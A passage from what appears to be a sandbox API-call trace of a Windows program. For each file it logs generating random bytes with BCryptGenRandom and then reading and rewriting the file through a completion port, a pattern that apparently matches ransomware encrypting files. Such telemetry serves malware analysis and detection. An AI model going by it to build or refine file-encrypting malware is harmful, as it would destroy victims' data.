lpOverlapped=0x35efc18) returned 1 [0120.858] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x60b7, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0121.132] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2dae, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0121.186] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.191] CloseHandle (hObject=0x308) returned 1 [0124.191] free (_Block=0x3d70450) [0124.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0124.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0124.198] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.198] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.198] free (_Block=0x3e305b8) [0124.198] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.198] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.199] free (_Block=0x1fa91d0) [0124.199] free (_Block=0x77d7a8) [0124.199] free (_Block=0x1fa90b8) [0124.199] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0124.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.210] CloseHandle (hObject=0x13c0) returned 1 [0124.210] free (_Block=0x1ff1e60) [0124.210] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.216] CloseHandle (hObject=0x340) returned 1 [0124.216] free (_Block=0x3e70008) [0124.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.224] CloseHandle (hObject=0x3bc) returned 1 [0124.225] free (_Block=0x3ef0008) [0124.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.235] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.245] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xf39f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0124.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.255] CloseHandle (hObject=0x340) returned 1 [0124.256] free (_Block=0x3d70450) [0124.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.256] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.276] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x62b1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.279] CloseHandle (hObject=0x3bc) returned 1 [0124.279] free (_Block=0x1ff1e60) [0124.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.279] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.339] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3801, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.429] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a92, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.430] CloseHandle (hObject=0x308) returned 1 [0124.430] free (_Block=0x3df0008) [0124.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0124.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0124.451] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.451] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.451] free (_Block=0x3e305b8) [0124.451] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.451] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.452] free (_Block=0x1fa91d0) [0124.452] free (_Block=0x77d7a8) [0124.452] free (_Block=0x1fa90b8) [0124.452] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.453] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.468] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x84b7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.586] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x409f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.587] CloseHandle (hObject=0x308) returned 1 [0124.588] free (_Block=0x3df0008) [0124.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0124.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0124.598] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.598] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.598] free (_Block=0x3e305b8) [0124.598] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.598] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.599] free (_Block=0x1fa91d0) [0124.599] free (_Block=0x77d7a8) [0124.599] free (_Block=0x1fa90b8) [0124.599] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.601] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc8d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.602] CloseHandle (hObject=0x308) returned 1 [0124.602] free (_Block=0x3df0008) [0124.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.612] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0124.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.614] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0124.615] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.615] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.615] free (_Block=0x3e305b8) [0124.615] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.615] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.615] free (_Block=0x1fa91d0) [0124.615] free (_Block=0x77d7a8) [0124.615] free (_Block=0x1fa90b8) [0124.615] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.617] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.982] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0124.982] CloseHandle (hObject=0x308) returned 1 [0124.983] free (_Block=0x3df0008) [0124.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0125.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0125.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0125.007] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0125.007] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0125.007] free (_Block=0x3e305b8) [0125.007] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0125.007] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0125.008] free (_Block=0x1fa91d0) [0125.008] free (_Block=0x77d7a8) [0125.008] free (_Block=0x1fa90b8) [0125.008] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0125.010] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0125.024] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x45be, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.025] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0125.041] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x133f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0125.092] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0125.109] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0126.279] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0127.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0128.660] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0128.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0129.655] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0129.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0130.781] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0132.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0135.755] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0135.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0135.839] CloseHandle (hObject=0x308) returned 1 [0135.840] free (_Block=0x3df0008) [0135.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, 